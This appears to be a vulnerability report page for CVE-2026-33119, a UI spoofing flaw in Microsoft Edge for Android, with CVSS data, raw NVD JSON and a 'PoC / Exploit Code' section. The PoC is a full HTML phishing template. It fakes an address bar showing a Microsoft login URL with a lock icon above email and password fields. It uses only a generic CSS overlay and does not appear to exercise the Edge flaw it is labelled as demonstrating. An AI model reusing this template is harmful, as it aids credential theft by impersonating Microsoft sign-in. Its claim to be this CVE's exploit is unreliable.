Security Vulnerability Report
CVE-2026-33119 CVSS 5.4 MEDIUM

Published: 2026-04-10 22:16:21
Last Modified: 2026-04-14 11:57:15

Description

User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network.

CVSS Details

CVSS Score: 5.4
Severity: MEDIUM
CVSS Vector: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N

Configurations (Affected Products)

cpe:2.3:a:microsoft:edge:*:*:*:*:*:android:*:* - VULNERABLE
Microsoft Edge (Chromium-based) (for the specific affected versions, refer to the official security advisory)

PoC / Exploit Code

⚠ For Security Research Only
The following code is for security research and authorized testing only.
html
<!--
  PoC for CVE-2026-33119: UI Spoofing in Microsoft Edge
  This demonstrates how to create a fake address bar using CSS.
-->
<!DOCTYPE html>
<html>
<head>
  <style>
    body {
      margin: 0;
      padding: 0;
      font-family: sans-serif;
    }
    /* Container to position the fake bar */
    .spoof-container {
      position: fixed;
      top: 0;
      left: 0;
      width: 100%;
      z-index: 9999;
      background-color: #f3f3f3;
      border-bottom: 1px solid #dcdcdc;
      padding: 8px 15px;
      display: flex;
      align-items: center;
      box-shadow: 0 2px 4px rgba(0,0,0,0.1);
    }
    .fake-lock {
      color: green;
      margin-right: 8px;
      font-weight: bold;
    }
    .fake-url {
      color: #202124;
      flex-grow: 1;
      background: white;
      padding: 4px 10px;
      border-radius: 12px;
      border: 1px solid #ddd;
    }
    .content {
      margin-top: 60px; /* Push content below fake bar */
      padding: 20px;
      text-align: center;
    }
  </style>
</head>
<body>
  <!-- Fake UI Element -->
  <div class="spoof-container">
    <span class="fake-lock">🔒</span>
    <div class="fake-url">https://www.login.microsoftonline.com</div>
  </div>
  <!-- Malicious Content -->
  <div class="content">
    <h2>Sign In</h2>
    <p>Please enter your credentials</p>
    <input type="text" placeholder="Email" style="width: 80%; padding: 10px;"><br><br>
    <input type="password" placeholder="Password" style="width: 80%; padding: 10px;"><br><br>
    <button>Log in</button>
  </div>
</body>
</html>

References

Raw JSON Data

JSON
{"cve": {"id": "CVE-2026-33119", "sourceIdentifier": "[email protected]", "published": "2026-04-10T22:16:21.287", "lastModified": "2026-04-14T11:57:14.647", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "User interface (ui) misrepresentation of critical information in Microsoft Edge (Chromium-based) allows an unauthorized attacker to perform spoofing over a network."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:L/I:L/A:N", "baseScore": 5.4, "baseSeverity": "MEDIUM", "attackVector": "NETWORK", "attackComplexity": "LOW", "privilegesRequired": "NONE", "userInteraction": "REQUIRED", "scope": "UNCHANGED", "confidentialityImpact": "LOW", "integrityImpact": "LOW", "availabilityImpact": "NONE"}, "exploitabilityScore": 2.8, "impactScore": 2.5}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-451"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:a:microsoft:edge:*:*:*:*:*:android:*:*", "versionEndExcluding": "147.0.3912.60", "matchCriteriaId": "4845F880-C10C-418A-9928-F40B0038B775"}]}]}], "references": [{"url": "https://msrc.microsoft.com/update-guide/vulnerability/CVE-2026-33119", "source": "[email protected]", "tags": ["Vendor Advisory"]}]}}